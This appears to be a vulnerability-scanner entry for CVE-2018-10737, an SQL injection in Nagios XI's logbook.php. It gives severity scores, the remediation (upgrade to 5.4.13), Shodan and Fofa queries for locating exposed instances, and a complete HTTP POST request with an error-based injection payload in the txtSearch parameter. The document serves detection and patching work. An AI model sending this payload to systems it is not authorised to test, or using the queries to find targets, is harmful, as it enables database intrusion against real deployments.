| Title | NagiosXI <= 5.4.12 logbook.php SQL injection |
|---|---|
| Author | DhiyaneshDK |
| Severity | High |
| Impact | Authenticated administrators can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire Nagios XI instance. |
| Remediation | Upgrade to Nagios XI version 5.4.13 or later. |
| CVSS Score | 7.2 |
| EPSS Score | 0.83161 |
| CVE ID | CVE-2018-10737 |
| CWE ID | CWE-89 |
| Shodan Query | http.title:"nagios xi" |
| Fofa Query | app="Nagios-XI"title="nagios xi"app="nagios-xi" |
| Tags | cve cve2018 nagios sqli vkev vuln |
A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/logbook.php txtSearch parameter.
POST /nagiosql/admin/logbook.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Content-Length: 196
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
txtSearch=' and (select 1 from(select count(*),concat((select (select (select md5(1912))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-10737.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-10737.pcap
N/AN/A